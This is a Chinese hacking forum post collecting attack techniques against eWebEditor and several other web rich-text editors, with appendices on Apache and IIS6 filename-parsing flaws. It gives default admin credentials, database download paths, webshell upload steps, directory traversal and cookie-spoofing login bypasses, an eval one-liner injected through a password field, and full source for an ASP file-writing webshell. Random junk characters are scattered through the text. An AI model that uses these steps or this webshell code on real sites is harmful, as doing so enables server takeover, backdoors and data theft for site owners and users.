eWebEditor编辑器漏洞大全

admin

1 N4 {- J9 y1 c. r
$ D* e& S& ^7 X! }--------------------------------------------------------------------------------
6 Z' e3 s4 S. |$ P1 w; r9 OeWebEditor
5 P& V0 J* A# ^: heWebEditor利用基础知识
3 P9 L% M! {+ C6 w默认后台地址：/ewebeditor/admin_login.asp
建议最好检测下admin_style.asp文件是否可以直接访问
. @7 \: J7 p8 I) Q
% R, }* K7 A6 i: a% f: E后台：admin/ewebeditor/admin_login.asp
; p/ I% P- Y3 V数据库：admin/ewebeditor/db/ewebeditor.mdb
7 {/ _6 q2 E0 ]# Y3 T) R( Y( g3 r7 D限制ASP   改成asaspp   aaspsp

默认数据库路径：[PATH]/db/ewebeditor.mdb
4 L" K! ^- q: [/ r; D) E                [PATH]/db/db.mdb            -- 某些CMS里是这个数据库
也可尝试        [PATH]/db/%23ewebeditor.mdb -- 某些管理员自作聪明的小伎俩

& G3 U, ?2 i  }9 J- @/ [使用默认密码：admin/admin888 或 admin/admin 进入后台，也可尝试 admin/123456 （有些管理员以及一些CMS，就是这么设置的）
' U" D" ^* F8 p4 f+ d
点击“样式管理”--可以选择新增样式，或者修改一个非系统样式，将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer，只要是服务器允许执行的脚本类型即可，点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式，点击插入图片，上传WEBSHELL，在“代码”模式中查看上传文件的路径。

. n; O/ _/ c9 q7 u+ G2、当数据库被管理员修改为asp、asa后缀的时候，可以插一句话木马服务端进入数据库，然后一句话木马客户端连接拿下webshell
3、上传后无法执行？目录没权限？帅锅你回去样式管理看你编辑过的那个样式，里面可以自定义上传路径的！！！
% c; T* b$ z6 \" @! G) [# c8 V4、设置好了上传类型，依然上传不了麽？估计是文件代码被改了，可以尝试设定“远程类型”依照6.0版本拿SHELL的方法来做（详情见下文↓），能够设定自动保存远程文件的类型。
# M8 `! p1 `6 y% I2 y% P* f5、不能添加工具栏，但设定好了某样式中的文件类型，怎么办？↓这么办！
(请修改action字段)
Action.html

7 u" j8 |8 A2 ^" |eWebEditor踩脚印式入侵
脆弱描述：
当我们下载数据库后查询不到密码MD5的明文时，可以去看看webeditor_style(14)这个样式表，看看是否有前辈入侵过 或许已经赋予了某控件上传脚本的能力，构造地址来上传我们自己的WEBSHELL.
. ?  d; ?, q, J* _1 z$ V攻击利用:
5 n( R# n$ J, m- d比如   ID=46     s-name =standard1
构造 代码:   ewebeditor.asp?id=content&style=standard
             ID和和样式名改过后
5 o" P3 i0 J: l, I3 l& J- F+ j             ewebeditor.asp?id=46&style=standard1
" ^) o8 ]0 @8 _: b) z8 o
) t. y4 n: y3 x5 A, g2 V6 M9 aeWebEditor遍历目录漏洞
$ T0 G6 D. Y8 B8 K脆弱描述：
ewebeditor/admin_uploadfile.asp
admin/upload.asp
& I! s( {0 }9 `; {: @7 D; F1 p过滤不严，造成遍历目录漏洞
8 l% d% s4 p" [$ |- d6 P8 X攻击利用:
5 x. E6 k9 U+ R5 e, s第一种:ewebeditor/admin_uploadfile.asp?id=14
7 N* S# p6 G( P在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.heimian.com/../.. 看到整个网站文件了
第二种: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
3 t# _1 H5 G2 t" [
eWebEditor 5.2 列目录漏洞
脆弱描述：
2 c$ |) z7 R7 _6 [# Mewebeditor/asp/browse.asp
* D+ V6 W" J) f* q. j- u/ }4 l过滤不严，造成遍历目录漏洞
攻击利用：
http://www.heimian.com/ewebedito ... tandard650&dir=…././/..
4 }4 A0 \- m0 N( t4 c
* z; g; B7 U: x利用WebEditor session欺骗漏洞,进入后台
( v! y6 n: O3 ^脆弱描述：
漏洞文件:Admin_Private.asp
# l# Q6 ]# Z* A  I只判断了session，没有判断cookies和路径的验证问题。
攻击利用:
新建一个test.asp内容如下:
8 j$ g6 P: j4 f, d- Z% Y<%Session("eWebEditor_User") = "11111111"%>
3 i- r& a5 }5 v) [访问test.asp，再访问后台任何文件，for example:Admin_Default.asp

eWebEditor asp版 2.1.6 上传漏洞
- E; W/ _; {) @% R$ ?6 S5 [/ A攻击利用:（请修改action字段为指定网址）
8 j: S6 ~$ F1 Q4 \3 @ewebeditor asp版2.1.6上传漏洞利用程序.html
# |* n$ c$ D7 n, B3 G& a
eWebEditor 2.7.0 注入漏洞
3 k3 D0 D. q. ?; e; {攻击利用:
http://www.heimian.com/ewebedito ... amp;style=full_v200
$ N0 e5 \" R* Z  D) W0 P. b. a默认表名：eWebEditor_System默认列名：sys_UserName、sys_UserPass，然后利用nbsi进行猜解.
! D5 N. s* ]/ G4 V2 L
7 r& ~, G) l/ T2 q4 o2 feWebEditor2.8.0最终版删除任意文件漏洞
脆弱描述：
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入。
& A! N# K0 x9 Q) Y* p: O2 D7 {+ ?攻击利用: (请修改action字段为指定网址)
1 w+ W7 r$ h$ N2 a7 X% W, Q4 gDel Files.html
. k' h& H; |# @( y
/ j9 U' X* z8 B. g3 e: xeWebEditor v6.0.0 上传漏洞
7 h* a$ f( z! N攻击利用:
在编辑器中点击“插入图片”--网络--输入你的WEBSHELL在某空间上的地址（注：文件名称必须为：xxx.jpg.asp 以此类推…），确定后，点击“远程文件自动上传”控件（第一次上传会提示你安装控件，稍等即可），查看“代码”模式找到文件上传路径，访问即可，eweb官方的DEMO也可以这么做，不过对上传目录取消掉了执行权限，所以上传上去也无法执行网马.

利用远程上传功能！
        比如s_full样式就存在这个功能，打开编辑页面，然后图片，选择输入url 比如:.asp ! 然后选择上传远程文件！自动就把1.gif.asp 保存在上传目录内！注:网上的东西大部分传来传去，这个办法愚弄自己还成！文件的确显示后缀为.asp 但是不能访问，因为收集过来的时候自动截止在1.gif了所以后面的.asp等于没有！而且gif的内容就是我们这个url的路径！呵呵，后来又看到一个利用方式！是利用远程搜集的时候执行,我们文件的代码生成另外的小马！
7 `( C0 V- L: B! k( a        利用代码如下:
首先建立1.gif.asp 代码如下
<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set MyTextStream=fs.OpenTextFile(server.MapPath("\akteam.asp"),1,false,0)
Thetext=MyTextStream.ReadAll
  \' _- Y3 U! @$ k8 i4 C8 n: aresponse.write thetext
%>
* g7 C7 m3 `: B; _; o在我们的1.gif.asp的同目录下建立一个akteam.asp文件，内容就是我们的小马：
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
+ G/ e8 B% r6 ^/ t& a1 o; N<%if path<>"" then%>
) Y2 d4 n6 G# [5 ~9 z<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
5 `6 [, R- h; N<%if err=0 then%>
<%="success"%>
# I+ ^, x2 U  c$ @3 h5 x<%else%>
8 \7 D* ?3 r! j& g( f<%="false"%>
% |1 q: R  X3 ^<%end if%>
! a7 H; y4 J. A! L<%err.clear%>
; d7 r8 `! o$ x5 S<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
6 d$ ]& [9 x) F- j  L<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
- N1 ]: o5 Q* b5 z<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
. Z. O& y- V* `3 M7 K. P<%="<input type=submit value=save>"%>
+ r0 M; I$ t  B1 ~<%="</form>"%>
. f1 [8 [* I& `% Y/ V利用上面说的远程上传的方式！可以得到webshell！成功率取决于，虚拟主机的安全设置！
0 r* `! q* e' g1 ?. f9 y! D
eWebEditor PHP/ASP…后台通杀漏洞
, C9 f/ @0 {) ?2 X$ ^, X影响版本: PHP ≥ 3.0~3.8与asp 2.8版也通用，或许低版本也可以，有待测试。
攻击利用:
进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了.
8 z. n1 R/ _1 w* p; U3 T+ m这时候你清空浏览器的url,然后输入
. H' S- ^) X" A0 B" h7 i. S7 B* ?
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));

$ e: p. O% q' h7 l5 v1 O而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php，就会直接进去。

eWebEditor for php任意文件上传漏洞
影响版本:ewebeditor php v3.8 or older version
, P# _; A# x+ S  B% Y7 f9 H5 I脆弱描述:
1 j* G6 t4 A1 [& `8 q! o此版本将所有的风格配置信息保存为一个数组$aStyle,在php.ini配置register_global为on的情况下我们可以任意添加自己喜欢的风格，并定义上传类型。
+ g0 ~6 k* L; m( Z1 O" k, F. n攻击利用:
phpupload.html
7 ?! |! B2 w& _! f$ Z
7 B% j0 B7 ~* }( J3 a: Z# ZeWebEditor JSP版漏洞
9 x3 K6 g- I+ K  D4 Q大同小异，我在本文档不想多说了，因为没环境 测试，网上垃圾场那么大，不好排查。用JSP编辑器的我觉得eweb会比FCKeditor份额少得多。
给出个连接：http://blog.haaker.cn/post/161.html
+ M; s* h, g3 Q& y" m9 T7 r6 z还有：http://www.anqn.com/zhuru/article/all/2008-12-04/a09104236.shtml
' D/ B: m4 d" \' `! T
  S9 a/ ?& y7 D: ReWebEditor 2.8 商业版插一句话木马
影响版本:=>2.8 商业版
! V, T# W2 H0 Q3 x攻击利用:
登陆后台，点击修改密码---新密码设置为 1":eval request("h")’
设置成功后，访问asp/config.asp文件即可，一句话木马被写入到这个文件里面了.
1 V$ ?6 o. k) W9 t$ g. J
eWebEditorNet upload.aspx 上传漏洞(WebEditorNet)
脆弱描述：
/ a4 @! l8 b8 W( {- }, W, p# U) kWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。
攻击利用:
( L# j$ v- P$ u7 k默认上传地址：/ewebeditornet/upload.aspx
可以直接上传一个cer的木马
如果不能上传则在浏览器地址栏中输入javascript:lbtnUpload.click();
3 V4 j( f( U/ R! y成功以后查看源代码找到uploadsave查看上传保存地址，默认传到uploadfile这个文件夹里。

& e$ a4 H7 z/ isouthidceditor(一般使用v2.8.0版eWeb核心)
http://www.heimian.com/admin/sou ... /southidceditor.mdb
! d1 g: Y  e3 u  X) d/ S" H7 R, Shttp://www.heimian.com/admin/southidceditor/admin/admin_login.asp
" |8 a. _0 h$ b2 z: D) F8 _http://www.heimian.com/admin/southidceditor/popup.asp

bigcneditor(eWeb 2.7.5 VIP核心)
0 R* E: M; ^/ N" N4 g其实所谓的Bigcneditor就是eWebEditor 2.7.5的VIP用户版.之所以无法访问admin_login.asp，提示“权限不够”4字真言，估计就是因为其授权“Licensed”问题,或许只允许被授权的机器访问后台才对。
$ N: F3 X; J  F) R) B6 S4 ?+ v' I( a
8 b' T' g2 }3 N! z9 ]或许上面针对eWebEditor v2.8以下低版本的小动作可以用到这上面来.貌似没多少动作?
/ b. W& Q$ B. d/ m--------------------------------------------------------------------------------
Cute Editor
: O2 w5 c  H. M( D# jCute Editor在线编辑器本地包含漏洞
影响版本:
. x$ n4 V+ D: d( Q+ ?CuteEditor For Net 6.4
脆弱描述：
- C( I! H4 f0 {: K, @* p& V可以随意查看网站文件内容，危害较大。
( Z6 j. ^" G( a" e, v% k2 J& A9 |攻击利用:
8 s! r6 K2 W, |9 a2 ohttp://www.heimian.com/CuteSoft_ ... ../../../web.config
( u: ]; I: g$ M& T  h. L
--------------------------------------------------------------------------------
Webhtmleditor
. e4 W! n. j) q( ?利用WIN 2003 IIS文件名称解析漏洞获得SHELL
5 H0 B& A/ R9 S) d影响版本：<= Webhtmleditor最终版1.7 (已停止更新)
' G' l2 N5 E2 J# S; m  x7 H7 z脆弱描述/攻击利用：
对上传的图片或其他文件无重命名操作，导致允许恶意用户上传diy.asp;.jpg来绕过对后缀名审查的限制，对于此类因编辑器作者意识犯下的错误，就算遭遇缩略图，文件头检测，也可使用图片木马 插入一句话来突破。
$ k: N! W1 p) E
9 A! T9 i! n0 ~; o% O--------------------------------------------------------------------------------
/ T/ `( o  W1 I' C7 X$ U5 }7 QKindeditor
" |: q+ x" }, l' ~- h! ?利用WIN 2003 IIS文件名称解析漏洞获得SHELL
6 |( k2 V# \4 B6 W9 x影响版本: <= kindeditor 3.2.1(09年8月份发布的最新版)
" h8 A4 C# _  t  `- d( `2 k脆弱描述/攻击利用：
拿官方做个演示：进入upload/2010/3/201003102334381513.jpg 大家可以前去围观。
9 |& z' N" W+ R6 n* nNote:参见附录C原理解析。
% K+ X# _$ C9 t$ T$ }) h
  k1 v, B( T+ }6 N, F1 w--------------------------------------------------------------------------------
; T/ ~0 f2 Y" l: k: _Freetextbox
Freetextbox遍历目录漏洞
影响版本：未知
- S* X- q0 y, A1 O脆弱描述：
+ ^0 }3 G5 ]7 Q+ M因为ftb.imagegallery.aspx代码中 只过滤了/但是没有过滤\符号所以导致出现了遍历目录的问题。
攻击利用:
9 J  {! E% |" v7 O" N/ H4 n在编辑器页面点图片会弹出一个框（抓包得到此地址）构造如下，可遍历目录。
. ~% W5 x- R) s$ w+ Thttp://www.heimian.com/Member/im ... amp;rif=..&cif=\..
--------------------------------------------------------------------------------
9 q4 U' x+ F9 J3 U
6 W' N9 M% X" T( n! y附录A：
Apache文件名解析缺陷漏洞：
, M, y7 ?, |( k$ y测试环境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
! O/ `$ v1 W: c$ I9 T: z( z) P
" E$ G. j4 ^, M- q1.国外(SSR TEAM)发了多个advisory称Apache's MIME module (mod_mime)相关漏洞,就是attack.php.rar会被当做php文件执行的漏洞，包括Discuz!那个p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
5 |+ b2 A# M( A, D& r# k
9 R9 N& ]$ ^  I5 f0 M3 W2.S4T的superhei在blog上发布了这个apache的小特性，即apache 是从后面开始检查后缀，按最后一个合法后缀执行。其实只要看一下apache的htdocs那些默认安装的index.XX文件就明白了。

9 l: i* `" _0 [3.superhei已经说的非常清楚了，可以充分利用在上传漏洞上，我按照普遍允许上传的文件格式测试了一下，列举如下(乱分类勿怪)
2 h! Q4 B, J" B典型型:rar
4 F6 h# Q# R9 q8 m备份型:bak,lock
. e7 u! c& ]& f1 K( J1 I2 h流媒体型：wma,wmv,asx,as,mp4,rmvb
微软型:sql,chm,hlp,shtml,asp
7 h- k7 r# [3 [; B8 f# O' n: l2 D任意型:test,fake,ph4nt0m
特殊型:torrent
程序型：jsp,c,cpp,pl,cgi

4.整个漏洞的关键就是apache的"合法后缀"到底是哪些，不是"合法后缀"的都可以被利用。
2 r0 ^: P& S4 k5 N5.测试环境
5 q/ D8 A: s& Q) a7 x" fa.php
<? phpinfo();?>
$ {6 I( Y  s2 v; y然后增加任意后缀测试,a.php.aaa,a.php.aab....

) s9 j/ S2 k- eBy cloie, in ph4nt0m.net(c) Security.

# o) ?6 {, J0 y2 f! y: w- k) W附录B：
1 B6 b% t& I: K# X; c9 P9 {安装了iis6的服务器(windows2003)，受影响的文件名后缀有.asp .asa .cdx .cer .pl .php .cgi

Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞，当文件夹名为类似hack.asp的时候（即文件夹名看起来像一个ASP文件的文件名），此时此文件夹下的任何类型的文件(比如.gif，.jpg，.txt等)都可以在IIS中被当做ASP程序来执行。这样黑*客即可上传扩展名为jpg或gif之类的看起来像是图片文件的木马文件，通过访问这个文件即可运行木马。如果这些网站中有任何一个文件夹的名字是以 .asp .php .cer .asa .cgi .pl 等结尾，那么放在这些文件夹下面的任何类型的文件都有可能被认为是脚本文件而交给脚本解析器而执行。
! w' f& |4 w% l( y5 B- y3 j0 [0 l$ b
附录C：
漏洞描述：
3 t) C7 z" A* K6 Q( ~/ f* k( y    当文件名为[YYY].asp;[ZZZ].jpg时，Microsoft IIS会自动以asp格式来进行解析。
    而当文件名为[YYY].php;[ZZZ].jpg时，Microsoft IIS会自动以php格式来进行解析。
    其中[YYY]与[ZZZ]处为可变化字符串。
  M3 ^7 {2 f3 D, P影响平台：
# w/ m6 J! ]# P. w/ d    Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0)
5 L- z( O8 x! o% c修补方法：
8 Q: S7 }$ I8 g    1、等待微软相关的补丁包
9 _1 E& b; A9 _  v& M: @! n, M    2、关闭图片所在目录的脚本执行权限（前提是你的某些图片没有与程序混合存放）
' S' k0 x6 i; S) M    3、校验网站程序中所有上传图片的代码段，对形如[YYY].asp;[ZZZ].jpg的图片做拦截
: V4 O5 h* F$ Y7 q% ?" e. i备注：
- |0 S0 [* p0 W8 O; a    对于Windows Server 2008(IIS7)以及Windows Server 2008 R2(IIS7.5) 则未受影响